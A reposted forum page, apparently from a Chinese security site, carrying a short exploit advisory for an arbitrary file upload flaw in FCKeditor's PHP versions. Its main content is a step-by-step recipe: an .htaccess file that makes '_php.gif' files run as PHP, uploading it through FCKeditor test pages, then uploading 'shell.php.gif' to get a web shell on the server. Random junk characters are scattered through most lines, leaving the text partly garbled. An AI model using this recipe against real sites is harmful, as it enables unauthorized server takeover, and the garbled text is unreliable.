FCKeditor所有php版本Upload上传漏洞- c- Q0 F6 m! I5 L
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
& i: e8 [2 A; }. e& V. i9 A减小字体 增大字体& G D# \. g% r) Q
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
! E1 l* c5 I3 Y3 v- j[+] Date: 2011
& w5 Q7 o4 i& C[+] Author : sinesafe.cn# H2 e/ e6 n/ B* o
[+] Website : WwW.sinesafe.cn, t5 n; {0 a+ _+ c
———————————————————
( D9 c& v, k0 D7 ^/ Z3 v1.create a htaccess file:+ V& \8 W- t8 k8 ?
code:! s% j) y2 L/ e. ]) W
<FilesMatch “_php.gif”>, I" o+ t8 D1 a' T/ S) R T. D! A
SetHandler application/x-httpd-php: d' K) ]( S% y, S' Y0 H3 m+ @
</FilesMatch>/ k% x2 I- {: \) ?* H
; c2 D5 E2 p7 c, S7 h2.Now upload this htaccess with FCKeditor.
M5 O# }' ?7 b3 c; S2 ]" h. p: J4 e# D' }; }# M$ @; u/ |
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
1 w0 ^: v! U3 v2 N8 }4 [9 q
7 Z: W$ U4 x0 p6 f# ohttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html z: z, h9 d y- m% o7 n( R
' J7 c* x* C6 F———————————————————————————————-
' d# J) K z1 ?. ?/ |6 h9 N3.Now upload shell.php.gif with FCKeditor.: @/ X8 E9 [" c8 z
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically., K, i' @& b$ Q8 O9 A0 L" t. C
5.http://www.sinesafe.cn/anything/shell_php.gif3 d: `6 I% L' z" ]) ^* K* h$ E
6.Now shell is available from server. |
}8 x$ ]! W% J0 s( W# L( b" G; P7 d
2 _% `3 }5 m+ X! f# m9 O |
发表于 2013-10-27 17:25:21
收藏
支持
反对